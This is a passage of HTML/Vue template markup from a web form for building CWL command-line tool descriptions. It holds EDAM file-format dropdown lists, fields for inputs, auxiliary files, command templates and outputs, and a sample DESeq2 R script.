data from Waters.</option>\n <option value=\"edam:format_3710\">WIFF format - Mass spectrum file format from QSTAR and QTRAP instruments (ABI/Sciex).</option>\n <option value=\"edam:format_3005\">WIG - Wiggle format (WIG) of a sequence annotation track that consists of a value...</option>\n <option value=\"edam:format_2032\">Workflow format - Format of a workflow.</option>\n <option value=\"edam:format_3711\">X!Tandem XML - Output format used by X! series search engines that is based on the XML...</option>\n <option value=\"edam:format_3598\">xbm - X BitMap is a plain text binary image format used by the X Window System...</option>\n <option value=\"edam:format_3618\">xgmml - XML-based format used to store graph descriptions within Galaxy.</option>\n <option value=\"edam:format_3468\">xls - Microsoft Excel spreadsheet format.</option>\n <option value=\"edam:format_3620\">xlsx - MS Excel spreadsheet format consisting of a set of XML documents stored in a...</option>\n <option value=\"edam:format_3811\">XMFA - The A2M format is used as the primary format for multiple alignments of...</option>\n <option value=\"edam:format_2332\">XML - eXtensible Markup Language (XML) format.</option>\n <option value=\"edam:format_3599\">xpm - X PixMap (XPM) is an image file format used by the X Window System, it is...</option>\n <option value=\"edam:format_3789\">XQuery - XQuery (XML Query) is a query language (format of queries) for querying and...</option>\n <option value=\"edam:format_3804\">xsd - XML format for XML Schema.</option>\n <option value=\"edam:format_3875\">XTC - Portable binary format for trajectories produced by GROMACS package.</option>\n <option value=\"edam:format_3877\">XYZ - The XYZ chemical file format is widely supported by many programs, although...</option>\n <option value=\"edam:format_3750\">YAML - YAML (YAML Ain't Markup Language) is a human-readable tree-structured data...</option>\n <option value=\"edam:format_3915\">Zarr - The Zarr format is an implementation of chunked, compressed, N-dimensional...</option>\n <option value=\"edam:format_3018\">ZTR - ZTR format for storing chromatogram data from DNA sequencing instruments.</option>\n </select>\n <p><small>Please specify the file format (optional). These formats are from the <a href=\"http://edamontology.org/page\" target=\"_blank\">EDAM Ontology</a> and apply to bioinformatics tools. If the format is not specified in the list, please contact us.</small></p>\n </div>\n\n <div class=\"form-group\" v-if=\"newInputType=='File' || newInputType=='Output_File'\">\n <label for=\"inputSecondary\">Secondary file(s):</label>\n <input v-model=\"newInputSecondary\" id=\"inputSecondary\" ref=\"newInputSecondary\" type=\"text\" class=\"form-control\" placeholder=\"Indicate any secondary files (separated by commas) that should accompany this file (example: .ann,.bwt). Spaces will be removed.\" />\n </div>\n\n <p v-if=\"input_errors.length > 0\"><font color=\"red\">\n <b>Please correct the following error(s):</b>\n <ul>\n <li v-for=\"error in input_errors\">{{ error }}</li>\n </ul>\n </font>\n </p>\n\n <div class=\"form-group\">\n <button class=\"btn btn-info\" :disabled=\"newInputName.trim() == '' || newInputDoc.trim() == ''\">Add / Update</button>\n </div>\n </form>\n\n <p v-if=\"inputs.length > 0\">Here you can edit (<span class=\"glyphicon glyphicon-edit\" aria-hidden=\"true\"></span>) or delete (<span class=\"glyphicon glyphicon-remove\" aria-hidden=\"true\"></span>) inputs.</p>\n\n <ol class=\"list-group\">\n <li v-for=\"input in inputs\" class=\"list-group-item\">{{ input.name }} - {{ input.type }}\n <button v-on:click=\"editInput(input)\" class=\"btn btn-default\">\n <span class=\"glyphicon glyphicon-edit\" aria-hidden=\"true\"></span>\n </button>\n <button v-on:click=\"deleteInput(input)\" class=\"btn btn-default\">\n <span class=\"glyphicon glyphicon-remove\" aria-hidden=\"true\"></span>\n </button>\n </li>\n </ol>\n\n <p v-if=\"overall_input_errors.length > 0\"><font color=\"red\">\n <b>Please correct the following error(s):</b>\n <ul>\n <li v-for=\"error in overall_input_errors\">{{ error }}</li>\n </ul>\n </font>\n </p>\n </div>\n\n <div class=\"panel panel-default\" ref=\"auxPanel\">\n <h4 class=\"card-title\">Manage auxiliary files:</h4>\n\n <p>In this section, you can manage auxiliary files (optional). Auxiliary files are stored within the execution environment and thus can be used in the command template (see below). Auxiliary files often include analysis scripts or configuration files (in CWL tool descriptions, they are stored under InitialWorkDirRequirement). <a v-on:click=\"var example_name = 'run_deseq2_analysis.R'; var example_contents = 'library(dplyr)\\nlibrary(readr)\\nlibrary(DESeq2)\\n\\nread_counts_url = commandArgs()[8]\\nphenotypes_url = commandArgs()[9]\\ndesign_formula = commandArgs()[10]\\nout_file_name = commandArgs()[11]\\n\\n# Read the data\\ncount_data = read_tsv(read_counts_url)\\nphenotypes_data = read_tsv(phenotypes_url)\\n\\n# The readr package does not allow row names, so we pull those from the first column.\\n# The readr package assigns a column name of X1 when the first column name is missing.\\ncount_row_names = pull(count_data, X1)\\ncount_data = select(count_data, -X1)\\ncount_data = as.matrix(count_data)\\nrownames(count_data) = count_row_names\\n\\nphenotypes_row_names = pull(phenotypes_data, X1)\\nphenotypes_data = select(phenotypes_data, -X1)\\nphenotypes_data = as.data.frame(phenotypes_data)\\nrownames(phenotypes_data) = phenotypes_row_names\\n\\n# These are the analysis steps.\\ndds <- DESeqDataSetFromMatrix(countData = count_data,\\n colData = phenotypes_data,\\n design = as.formula(design_formula))\\ndds <- DESeq(dds)\\nres <- results(dds)\\n\\n# Now save the results, sorted by adjusted P-value.\\nwrite.table(res[order(res$padj),], out_file_name, sep="\\\\t", row.names=TRUE, col.names=NA, quote=FALSE)'; if (newAuxName == example_name && newAuxContents == example_contents) { newAuxName = example_cache['newAuxName']; newAuxContents = example_cache['newAuxContents'] } else { example_cache['newAuxName'] = newAuxName; example_cache['newAuxContents'] = newAuxContents; newAuxName = example_name; newAuxContents = example_contents; }\">Show/hide example</a>.\n\n <form v-on:submit.prevent=\"addAuxiliaryFile\">\n <div class=\"form-group\">\n <label for=\"auxName\">Name:</label>\n <input v-model=\"newAuxName\" id=\"auxName\" ref=\"newAuxName\" type=\"text\" class=\"form-control\" placeholder=\"Please enter a unique name for this auxiliary file. Only letters, numbers, underscores, and periods are allowed.\" />\n </div>\n\n <div class=\"form-group\">\n <label for=\"auxContents\">Contents:</label>\n <textarea v-model=\"newAuxContents\" id=\"auxContents\" rows=10 cols=100 ref=\"newAuxContents\" class=\"form-control\" placeholder=\"Provide enter the file contents.\" style=\"font-family:monospace;\"></textarea>\n </div>\n\n <p v-if=\"auxiliary_errors.length > 0\"><font color=\"red\">\n <b>Please correct the following error(s):</b>\n <ul>\n <li v-for=\"error in auxiliary_errors\">{{ error }}</li>\n </ul>\n </font>\n </p>\n\n <div class=\"form-group\">\n <button class=\"btn btn-info\" :disabled=\"newAuxName == '' || newAuxContents == ''\">Add / Update</button>\n </div>\n </form>\n\n <p v-if=\"auxiliary_files.length > 0\">Here you can edit (<span class=\"glyphicon glyphicon-edit\" aria-hidden=\"true\"></span>) or delete (<span class=\"glyphicon glyphicon-remove\" aria-hidden=\"true\"></span>) auxiliary files.</p>\n\n <ol class=\"list-group\">\n <li v-for=\"aux in auxiliary_files\" class=\"list-group-item\">{{ aux.name }}\n <button v-on:click=\"editAuxiliaryFile(aux)\" class=\"btn btn-default\">\n <span class=\"glyphicon glyphicon-edit\" aria-hidden=\"true\"></span>\n </button>\n <button v-on:click=\"deleteAuxiliaryFile(aux, true)\" class=\"btn btn-default\">\n <span class=\"glyphicon glyphicon-remove\" aria-hidden=\"true\"></span>\n </button>\n </li>\n </ol>\n </div>\n\n <div class=\"panel panel-default\" ref=\"outputPanel\">\n <h4 class=\"card-title\">Specify command template<sup><font color=\"red\">*</font></sup>:</h4>\n\n <p>Here you specify a template for executing the tool at the command line within the execution environment. Each input must be referenced at least once in the command template. For example, if you had defined an input string called \"my_string\", you would reference it in the command template as <code>$(inputs.my_string)</code>. You would follow a similar pattern for inputs that are integers or \"output files.\" However, it is different for input files; the input object will have multiple attributes, and you must specify one of these. For example, if you had defined an input file called \"my_file\" and wanted to refer to the path of that file, you would specify it in the command template as $(inputs.my_file.path). Alternatively, if you wanted to refer only to the name of the file, you would use <code>$(inputs.my_file.basename)</code>. <a href=\"https://www.commonwl.org/v1.2/CommandLineTool.html#File\" target=\"_blank\">Other attributes</a> are available. <a v-on:click=\"var example = 'Rscript run_deseq2_analysis.R "$(inputs.read_counts_url)" "$(inputs.phenotypes_url)" "$(inputs.design_formula)" "$(inputs.output_file)"'; if (command_template == example) { command_template = example_cache['command_template']; } else { example_cache['command_template'] = command_template; command_template = example; }\">Show/hide example</a>.\n\n <div class=\"form-group\">\n <textarea v-model=\"command_template\" id=\"command_template\" rows=5 cols=100 placeholder=\"Please enter the command template.\" class=\"form-control\" aria-describedby=\"helpBlock\"></textarea>\n </div>\n\n <p v-if=\"template_errors.length\"><font color=\"red\">\n <b>Please correct the following error(s):</b>\n <ul>\n <li v-for=\"error in template_errors\">{{ error }}</li>\n </ul>\n </font>\n </p>\n </div>\n\n <div class=\"panel panel-default\" ref=\"outputPanel\">\n <h4 class=\"card-title\">Manage outputs<sup><font color=\"red\">*</font></sup>:</h4>\n\n <p>After a tool executes successfully, you can collect three kinds of output. <em>Standard output</em> typically consists of messages or data printed to the console. <em>Standard error</em> typically consists of errors, warnings, or diagnostic information printed to the console. In addition, many command-line tools generate new data files.</p>\n\n <p>In this section, you can specify alternate names for the files that will store standard output and standard error.</p>\n\n <div class=\"form-group\">\n <label for=\"stdout_file_name\">Standard output file name:</label>\n <input v-model=\"stdout_file_name\" id=\"stdout_file_name\" ref=\"stdout_file_name\" type=\"text\" class=\"form-control\" placeholder=\"Enter a file name in which standard output will be stored after the tool executes.\" />\n </div>\n\n <div class=\"form-group\">\n <label for=\"stderr_file_name\">Standard error file name:</label>\n <input v-model=\"stderr_file_name\" id=\"stderr_file_name\" ref=\"stderr_file_name\" type=\"text\" class=\"form-control\" placeholder=\"Enter a file name in which standard error will be stored after the tool executes.\" />\n </div>\n\n <p>Here you can specify any output files that will be generated by the tool and that you wish to collect after the tool executes. <em>These are separate from any \"Output Files\" you may have declared in the Inputs section.</em> Please enter a unique identifier and a file pattern that represents the output file that you wish to collect. The file pattern can include <a href=\"https://en.wikipedia.org/wiki/Wildcard_character#File_and_directory_patterns\" target=\"_blank\">UNIX-like wildcard characters</a>. If the file will always have the same name, you can just enter the name of that file. Alternatively, you can enter an expression that references the inputs. For example, if you had specified an input file named \"bam_file\" and wished to collect an output file of the same name, you would specify the output expression as <code>$(inputs.bam_file.basename)</code>. The \".basename\" portion refers to the name of the input file and excludes the rest of the path. Other properties can be found <a href=\"https://www.commonwl.org/v1.2/CommandLineTool.html#File\" target=\"_blank\">here</a>.\n\n <form v-on:submit.prevent=\"addOutput\">\n <div class=\"form-group\">\n <label for=\"outputID\">Identifier:</label> (<a v-on:click=\"var example = 'output_bam_file'; if (newOutputID == example) { newOutputID = example_cache['newOutputID']; } else { example_cache['newOutputID'] = newOutputID; newOutputID = example; }\">Show/hide example</a>)\n <input v-model=\"newOutputID\" id=\"outputID\" ref=\"newOutputID\" type=\"text\" class=\"form-control\" placeholder=\"Please enter a unique identifier for this output file.\" />\n </div>\n\n <div class=\"form-group\">\n <label for=\"outputGlob\">Wildcard expression:</label> (<a v-on:click=\"var example = '$(inputs.bam_file.basename)'; if (newOutputGlob == example) { newOutputGlob = example_cache['newOutputGlob']; } else { example_cache['newOutputGlob'] = newOutputGlob; newOutputGlob = example; }\">Show/hide example</a>)\n <input v-model=\"newOutputGlob\" id=\"outputGlob\" ref=\"newOutputGlob\" type=\"text\" class=\"form-control\" placeholder=\"Please enter an expression for this output file.\" />\n </div>\n\n <div class=\"form-group\">\n <label for=\"outputDoc\">Documentation:</label> (<a v-on:click=\"var example = 'A sorted BAM file.'; if (newOutputDoc == example) { newOutputDoc = example_cache['newOutputDoc']; } else { example_cache['newOutputDoc'] = newOutputDoc; newOutputDoc = example; }\">Show/hide example</a>)\n <input v-model=\"newOutputDoc\" id=\"outputDoc\" ref=\"newOutputDoc\" type=\"text\" class=\"form-control\" placeholder=\"Provide a short description of this output file.\" />\n </div>\n\n <div class=\"form-group\">\n <label for=\"outputSecondary\">Secondary file(s):</label> (<a v-on:click=\"var example = '.bai'; if (newOutputSecondary == example) { newOutputSecondary = example_cache['newOutputSecondary']; } else { example_cache['newOutputSecondary'] = newOutputSecondary; newOutputSecondary = example; }\">Show/hide example</a>)\n <input v-model=\"newOutputSecondary\" id=\"outputSecondary\" ref=\"newOutputSecondary\" type=\"text\" class=\"form-control\" placeholder=\"Indicate any secondary files (separated by commas) that should accompany this file (example: .ann,.bwt). Spaces will be removed.\" />\n </div>\n\n <div class=\"form-group\">\n <label for=\"outputFileFormat\">File format:</label>\n <select v-model=\"newOutputFileFormat\" id=\"outputFileFormat\" class=\"form-control\" id=\"outputFileFormat\">\n <option value=\"\"></option>\n <option value=\"edam:format_1964\">plain text format (unformatted) - Plain text sequence format (essentially unformatted).</option>\n <option value=\"edam:format_3010\">.nib - .nib (nibble) binary format of a nucleotide sequence using 4 bits per...</option>\n <option value=\"edam:format_3009\">2bit - 2bit binary format of nucleotide sequences using 2 bits per nucleotide. In...</option>\n <option value=\"edam:format_2064\">3D-1D scoring matrix format - Format of a matrix of 3D-1D scores (amino acid environment probabilities).</option>\n <option value=\"edam:format_3281\">A2M - The A2M format is used as the primary format for multiple alignments of...</option>\n <option value=\"edam:format_1504\">aaindex - Amino acid index format used by the AAindex database.</option>\n <option value=\"edam:format_3000\">AB1 - AB1 binary format of raw DNA sequence reads (output of Applied Biosystems'...</option>\n <option value=\"edam:format_3708\">ABCD format - Exchange format of the Access to Biological Collections Data (ABCD) Schema;...</option>\n <option value=\"edam:format_1628\">ABI - A format of raw sequence read data from an Applied Biosystems sequencing...</option>\n <option value=\"edam:format_3001\">ACE - ACE sequence assembly format including contigs, base-call qualities, and...</option>\n <option value=\"edam:format_1923\">acedb - ACEDB sequence format.</option>\n <option value=\"edam:format_1639\">affymetrix - Format of affymetrix gene cluster files (hc-genes.txt, hc-chips.txt) from...</option>\n <option value=\"edam:format_1641\">affymetrix-exp - Affymetrix data file format for information about experimental conditions...</option>\n <option value=\"edam:format_3582\">afg - AFG is a single text-based file assembly format that holds read and...</option>\n <option value=\"edam:format_3693\">AGP - AGP is a tabular format for a sequence assembly (a contig, a...</option>\n <option value=\"edam:format_1921\">Alignment format - Data format for molecular sequence alignment information.</option>\n <option value=\"edam:format_2920\">Alignment format (pair only) - Data format for molecular sequence alignment information that can hold...</option>\n <option value=\"edam:format_2554\">Alignment format (text) - Text format for molecular sequence alignment information.</option>\n <option value=\"edam:format_2555\">Alignment format (XML) - XML format for molecular sequence alignment information.</option>\n <option value=\"edam:format_3888\">AMBER frcmod - AMBER frcmod (Force field Modification) is a file format to store any...</option>\n <option value=\"edam:format_3889\">AMBER off - AMBER Object File Format library files (OFF library files) store residue...</option>\n <option value=\"edam:format_3881\">AMBER top - AMBER Prmtop file (version 7) is a structure topology text file divided in...</option>\n <option value=\"edam:format_2097\">ambiguous - Alphabet for a molecular sequence with possible unknown positions and...</option>\n <option value=\"edam:format_2017\">Amino acid index format - Data format for an amino acid index.</option>\n <option value=\"edam:format_3780\">Annotated text format - Data format of an annotated text, e.g. with recognised entities, concepts,...</option>\n <option value=\"edam:format_3830\">ARB - Binary format used by the ARB software suite</option>\n <option value=\"edam:format_3581\">arff - ARFF (Attribute-Relation File Format) is an ASCII text file format that...</option>\n <option value=\"edam:format_2020\">Article format - Data format for a full-text scientific article.</option>\n <option value=\"edam:format_1966\">ASN.1 sequence format - NCBI ASN.1-based sequence format.</option>\n <option value=\"edam:format_3013\">axt - axt format of alignments, typically produced from BLASTZ.</option>\n <option value=\"edam:format_3327\">BAI - BAM indexing format</option>\n <option value=\"edam:format_2572\">BAM - BAM format, the binary, BGZF-formatted compressed version of SAM format for...</option>\n <option value=\"edam:format_3020\">BCF - BCF, the binary version of Variant Call Format (VCF) for sequence variation...</option>\n <option value=\"edam:format_3689\">BCML - Biological Connection Markup Language (BCML) is an XML format for biological...</option>\n <option value=\"edam:format_3690\">BDML - Biological Dynamics Markup Language (BDML) is an XML format for quantitative...</option>\n <option value=\"edam:format_3843\">BEAST - XML input file format for BEAST Software (Bayesian Evolutionary Analysis...</option>\n <option value=\"edam:format_3003\">BED - Browser Extensible Data (BED) format of sequence annotation track, typically...</option>\n <option value=\"edam:format_3586\">bed12 - A BED file where each feature is described by all twelve columns.</option>\n <option value=\"edam:format_3585\">bed6 - BED file format where each feature is described by chromosome, start, end,...</option>\n <option value=\"edam:format_3583\">bedgraph - The bedGraph format allows display of continuous-valued data in track...</option>\n <option value=\"edam:format_3584\">bedstrict - Browser Extensible Data (BED) format of sequence annotation track that...</option>\n <option value=\"edam:format_3691\">BEL - Biological Expression Language (BEL) is a textual format for representing...</option>\n <option value=\"edam:format_3615\">bgzip - Blocked GNU Zip format.</option>\n <option value=\"edam:format_2848\">Bibliographic reference format - Format of a bibliographic reference.</option>\n <option value=\"edam:format_3004\">bigBed - bigBed format for large sequence annotation tracks, similar to textual BED...</option>\n <option value=\"edam:format_3006\">bigWig - bigWig format for large sequence annotation tracks that consist of a value...</option>\n <option value=\"edam:format_2333\">Binary format - Binary format.</option>\n <option value=\"edam:format_3885\">BinPos - Scripps Research Institute BinPos format is a binary formatted file to store...</option>\n <option value=\"edam:format_3782\">BioC - BioC is a standardised XML format for sharing and integrating text data and...</option>\n <option value=\"edam:format_3706\">Biodiversity data format - Data format for biodiversity data.</option>\n <option value=\"edam:format_3772\">BioJSON (BioXSD) - BioJSON is a BioXSD-schema-based JSON format of sequence-based data and some...</option>\n <option value=\"edam:format_3774\">BioJSON (Jalview) - BioJSON is a JSON format of single multiple sequence alignments, with their...</option>\n <option value=\"edam:format_2013\">Biological pathway or network format - Data format for a biological pathway or network.</option>\n <option value=\"edam:format_3166\">Biological pathway or network report format - Data format for a report of information derived from a biological pathway or...</option>\n <option value=\"edam:format_3746\">BIOM format - The BIological Observation Matrix (BIOM) is a format for representing...</option>\n <option value=\"edam:format_3785\">BioNLP Shared Task format - A family of similar formats of text annotation, used by BRAT and other...</option>\n <option value=\"edam:format_3156\">BioPAX - BioPAX is an exchange format for pathway data, with its data model defined...</option>\n <option value=\"edam:format_2352\">BioXSD (XML) - BioXSD-schema-based XML format of sequence-based data and some other common...</option>\n <option value=\"edam:format_3773\">BioYAML - BioYAML is a BioXSD-schema-based YAML format of sequence-based data and some...</option>\n <option value=\"edam:format_1333\">BLAST results - Format of results of a sequence database search using some variant of BLAST.</option>\n <option value=\"edam:format_3331\">BLAST XML results format - XML format as produced by the NCBI Blast package</option>\n <option value=\"edam:format_3836\">BLAST XML v2 results format - XML format as produced by the NCBI Blast package v2.</option>\n <option value=\"edam:format_3313\">BLC - A multiple alignment in vertical format, as used in the AMPS (Alignment of...</option>\n <option value=\"edam:format_3592\">BMP - Standard bitmap storage format in the Microsoft Windows environment.</option>\n <option value=\"edam:format_3909\">BpForms - BpForms is a string format for concretely representing the primary...</option>\n <option value=\"edam:format_3487\">BSML - Bioinformatics Sequence Markup Language format.</option>\n <option value=\"edam:format_3776\">BTrack - BTrack is an HDF5-based binary format for genome or sequence feature tracks...</option>\n <option value=\"edam:format_1630\">CAF - Common Assembly Format (CAF). A sequence assembly format including contigs,...</option>\n <option value=\"edam:format_3100\">CATH domain report format - Format of summary of domain classification information for a CATH domain.</option>\n <option value=\"edam:format_2184\">cdsxml - XML format for EMBL entries.</option>\n <option value=\"edam:format_1638\">cel - Format of Affymetrix data file of information about (raw) expression levels...</option>\n <option value=\"edam:format_3240\">CellML - CellML, the format for mathematical models of biological and other networks.</option>\n <option value=\"edam:format_3844\">Chado-XML - Chado-XML format is a direct mapping of the Chado relational schema into XML.</option>\n <option value=\"edam:format_3887\">CHARMM rtf - Format of CHARMM Residue Topology Files (RTF), which define groups by...</option>\n <option value=\"edam:format_2030\">Chemical data format - Format of a report on a chemical compound.</option>\n <option value=\"edam:format_2035\">Chemical formula format - Text format of a chemical formula.</option>\n <option value=\"edam:format_1644\">CHP - Format of Affymetrix data file of information about (normalised) expression...</option>\n <option value=\"edam:format_3587\">chrominfo - Tabular format of chromosome names and sizes used by Galaxy.</option>\n <option value=\"edam:format_1737\">CiteXplore-all - CiteXplore 'all' citation format includes all known details such as Mesh...</option>\n <option value=\"edam:format_1736\">CiteXplore-core - CiteXplore 'core' citation format including title, journal, authors and...</option>\n <option value=\"edam:format_1424\">ClustalW dendrogram - Dendrogram (tree file) format generated by ClustalW.</option>\n <option value=\"edam:format_1982\">ClustalW format - ClustalW format for (aligned) sequences.</option>\n <option value=\"edam:format_1925\">codata - Codata entry format.</option>\n <option value=\"edam:format_3686\">COMBINE OMEX - Open Modeling EXchange format (OMEX) is a ZIPped format for encapsulating...</option>\n <option value=\"edam:format_2566\">completely unambiguous - Alphabet for a molecular sequence without any unknown positions or ambiguity...</option>\n <option value=\"edam:format_2567\">completely unambiguous pure - Alphabet for a molecular sequence without unknown positions, ambiguity or...</option>\n <option value=\"edam:format_2569\">completely unambiguous pure dna - Alphabet for a DNA sequence (characters ACGT only) without unknown...</option>\n <option value=\"edam:format_2568\">completely unambiguous pure nucleotide - Alphabet for a nucleotide sequence (characters ACGTU only) without unknown...</option>\n <option value=\"edam:format_2607\">completely unambiguous pure protein - Alphabet for any protein sequence without unknown positions, ambiguity or...</option>\n <option value=\"edam:format_2570\">completely unambiguous pure rna sequence - Alphabet for an RNA sequence (characters ACGU only) without unknown...</option>\n <option value=\"edam:format_1209\">consensus - Alphabet for the consensus of two or more molecular sequences.</option>\n <option value=\"edam:format_3832\">consensusXML - OpenMS format for grouping features in one map or across several maps.</option>\n <option value=\"edam:format_3239\">CopasiML - CopasiML, the native format of COPASI.</option>\n <option value=\"edam:format_3462\">CRAM - Reference-based compression of alignment format</option>\n <option value=\"edam:format_3589\">csfasta - Color space FASTA format sequence variant.</option>\n <option value=\"edam:format_3752\">CSV - Tabular data represented as comma-separated values in a text file.</option>\n <option value=\"edam:format_3309\">CT - File format of a CT (Connectivity Table) file from the RNAstructure package.</option>\n <option value=\"edam:format_3588\">customtrack - Custom Sequence annotation track format used by Galaxy.</option>\n <option value=\"edam:format_3857\">CWL - Common Workflow Language (CWL) format for description of command-line tools...</option>\n <option value=\"edam:format_3235\">Cytoband format - Cytoband format for chromosome cytobands.</option>\n <option value=\"edam:format_3477\">Cytoscape input file format - Format of the cytoscape input file of gene expression ratios or values are...</option>\n <option value=\"edam:format_1393\">daf - EMBASSY 'domain alignment file' (DAF) format, containing a sequence...</option>\n <option value=\"edam:format_1967\">DAS format - DAS sequence (XML) format (any type).</option>\n <option value=\"edam:format_1968\">dasdna - DAS sequence (XML) format (nucleotide-only).</option>\n <option value=\"edam:format_1978\">DASGFF - DAS GFF (XML) feature format.</option>\n <option value=\"edam:format_1637\">dat - Format of Affymetrix data file of raw image data.</option>\n <option value=\"edam:format_3326\">Data index format - Format of a data index of some type.</option>\n <option value=\"edam:format_2066\">Database hits (sequence) format - Format of a report on sequence hits and associated data from searching a...</option>\n <option value=\"edam:format_3729\">dbGaP format - Input format used by the Database of Genotypes and Phenotypes (dbGaP).</option>\n <option value=\"edam:format_1926\">dbid - Fasta format variant with database name before ID.</option>\n <option value=\"edam:format_1983\">debug - EMBOSS alignment format for debugging trace of full internal data content.</option>\n <option value=\"edam:format_1979\">debug-feat - EMBOSS debugging trace feature format of full internal data content.</option>\n <option value=\"edam:format_1969\">debug-seq - EMBOSS debugging trace sequence format of full internal data content.</option>\n <option value=\"edam:format_1336\">dhf - Format of EMBASSY domain hits file (DHF) of hits (sequences) with domain...</option>\n <option value=\"edam:format_1392\">DIALIGN format - Format of multiple sequences aligned by DIALIGN package.</option>\n <option value=\"edam:format_3548\">DICOM format - Medical image format corresponding to the Digital Imaging and Communications...</option>\n <option value=\"edam:format_2074\">Dirichlet distribution format - Data format of a dirichlet distribution.</option>\n <option value=\"edam:format_1212\">dna - Alphabet for a DNA sequence with possible ambiguity, unknown positions and...</option>\n <option value=\"edam:format_3507\">Document format - Format of documents including word processor, spreadsheet and presentation.</option>\n <option value=\"edam:format_3506\">docx - Microsoft Word format.</option>\n <option value=\"edam:format_1457\">Dot-bracket format - Format of RNA secondary structure in dot-bracket notation, originally...</option>\n <option value=\"edam:format_1454\">dssp - Format of an entry from the DSSP database (Dictionary of Secondary Structure...</option>\n <option value=\"edam:format_3751\">DSV - Tabular data represented as values in a text file delimited by some...</option>\n <option value=\"edam:format_3652\">dta - Spectral data format file where each spectrum is written to a separate file.</option>\n <option value=\"edam:format_3157\">EBI Application Result XML - EBI Application Result XML is a format returned by sequence similarity...</option>\n <option value=\"edam:format_3484\">ebwt - Bowtie format for indexed reference genome for small genomes.</option>\n <option value=\"edam:format_3491\">ebwtl - Bowtie format for indexed reference genome for large genomes.</option>\n <option value=\"edam:format_3818\">ELAND format - Tab-delimited text file format used by Eland - the read-mapping program...</option>\n <option value=\"edam:format_1248\">EMBL feature location - Format for sequence positions (feature location) as used in...</option>\n <option value=\"edam:format_1927\">EMBL format - EMBL entry format.</option>\n <option value=\"edam:format_2204\">EMBL format (XML) - An XML format for EMBL entries.</option>\n <option value=\"edam:format_2311\">EMBL-HTML - EMBL entry format wrapped in HTML elements.</option>\n <option value=\"edam:format_2181\">EMBL-like (text) - A text format resembling EMBL entry format.</option>\n <option value=\"edam:format_2558\">EMBL-like (XML) - An XML format resembling EMBL entry format.</option>\n <option value=\"edam:format_2543\">EMBL-like format - A format resembling EMBL entry (plain text) format.</option>\n <option value=\"edam:format_2183\">EMBLXML - XML format for EMBL entries.</option>\n <option value=\"edam:format_1297\">EMBOSS repeat - Report format for tandem repeats in a sequence (an EMBOSS report format).</option>\n <option value=\"edam:format_1357\">EMBOSS sequence pattern - Format of an EMBOSS sequence pattern.</option>\n <option value=\"edam:format_2001\">EMBOSS simple format - EMBOSS simple multiple alignment format.</option>\n <option value=\"edam:format_3614\">ENCODE broad peak format - Human ENCODE broad peak format.</option>\n <option value=\"edam:format_3613\">ENCODE narrow peak format - Human ENCODE narrow peak format.</option>\n <option value=\"edam:format_3612\">ENCODE peak format - Human ENCODE peak format.</option>\n <option value=\"edam:format_3499\">Ensembl variation file format - Ensembl standard format for variation data.</option>\n <option value=\"edam:format_2027\">Enzyme kinetics report format - Data format for reports on enzyme kinetics.</option>\n <option value=\"edam:format_3466\">EPS - Encapsulated PostScript format</option>\n <option value=\"edam:format_1316\">est2genome format - Format of a report on exon-intron structure generated by EMBOSS est2genome.</option>\n <option value=\"edam:format_1631\">EXP - Sequence assembly project file EXP format.</option>\n <option value=\"edam:format_3167\">Experiment annotation format - Data format for annotation on a laboratory experiment.</option>\n <option value=\"edam:format_1929\">FASTA - FASTA format including NCBI-style IDs.</option>\n <option value=\"edam:format_1332\">FASTA search results format - Format of results of a sequence database search using FASTA.</option>\n <option value=\"edam:format_1984\">FASTA-aln - Fasta format for (aligned) sequences.</option>\n <option value=\"edam:format_2310\">FASTA-HTML - FASTA format wrapped in HTML elements.</option>\n <option value=\"edam:format_2546\">FASTA-like - A format resembling FASTA format.</option>\n <option value=\"edam:format_2200\">FASTA-like (text) - A text format resembling FASTA format.</option>\n <option value=\"edam:format_3823\">FASTG - FASTG is a format for faithfully representing genome assemblies in the face...</option>\n <option value=\"edam:format_1930\">FASTQ - FASTQ short read format ignoring quality scores.</option>\n <option value=\"edam:format_1931\">FASTQ-illumina - FASTQ Illumina 1.3 short read format.</option>\n <option value=\"edam:format_2545\">FASTQ-like format - A format resembling FASTQ short read format.</option>\n <option value=\"edam:format_2182\">FASTQ-like format (text) - A text format resembling FASTQ short read format.</option>\n <option value=\"edam:format_1932\">FASTQ-sanger - FASTQ short read format with phred quality.</option>\n <option value=\"edam:format_1933\">FASTQ-solexa - FASTQ Solexa/Illumina 1.0 short read format.</option>\n <option value=\"edam:format_3833\">featureXML - OpenMS format for quantitation results (LC/MS features).</option>\n <option value=\"edam:format_3884\">FF parameter format - Format of force field parameter files, which store the set of parameters...</option>\n <option value=\"edam:format_1582\">findkm - A report format for the kinetics of enzyme-catalysed reaction(s) in a format...</option>\n <option value=\"edam:format_1934\">fitch program - Fitch program format.</option>\n <option value=\"edam:format_1915\">Format - A defined way or layout of representing and structuring data in a computer...</option>\n <option value=\"edam:format_2350\">Format (by type of data) - A placeholder concept for visual navigation by dividing data formats by the...</option>\n <option value=\"edam:format_3163\">GCDML - GCDML XML format for genome and metagenome metadata according to...</option>\n <option value=\"edam:format_1935\">GCG - GCG sequence file format.</option>\n <option value=\"edam:format_3486\">GCG format variant - Some format based on the GCG format.</option>\n <option value=\"edam:format_1947\">GCG MSF - GCG MSF (multiple sequence file) file format.</option>\n <option value=\"edam:format_3709\">GCT/Res format - Tab-delimited text files of GenePattern that contain a column for each...</option>\n <option value=\"edam:format_3312\">GDE - Format for the Genetic Data Environment (GDE).</option>\n <option value=\"edam:format_3249\">GelML - GelML is the format for describing the process of gel electrophoresis,...</option>\n <option value=\"edam:format_3622\">Gemini SQLite format - Data format used by the SQLite database conformant to the Gemini schema.</option>\n <option value=\"edam:format_3812\">GEN - The GEN file format contains genetic data and describes SNPs.</option>\n <option value=\"edam:format_1936\">GenBank format - Genbank entry format.</option>\n <option value=\"edam:format_2532\">GenBank-HTML - Genbank entry format wrapped in HTML elements.</option>\n <option value=\"edam:format_2559\">GenBank-like format - A format resembling GenBank entry (plain text) format.</option>\n <option value=\"edam:format_2205\">GenBank-like format (text) - A text format resembling GenBank entry (plain text) format.</option>\n <option value=\"edam:format_2031\">Gene annotation format - Format of a report on a particular locus, gene, gene system or groups of...</option>\n <option value=\"edam:format_2058\">Gene expression report format - Format of a file of gene expression data, e.g. a gene expression matrix or...</option>\n <option value=\"edam:format_3011\">genePred - genePred table format for gene prediction tracks.</option>\n <option value=\"edam:format_2186\">geneseq - Geneseq sequence format.</option>\n <option value=\"edam:format_1937\">genpept - Genpept protein entry format.</option>\n <option value=\"edam:format_2305\">GFF - GFF feature format (of indeterminate version).</option>\n <option value=\"edam:format_1974\">GFF2 - General Feature Format (GFF) of sequence features.</option>\n <option 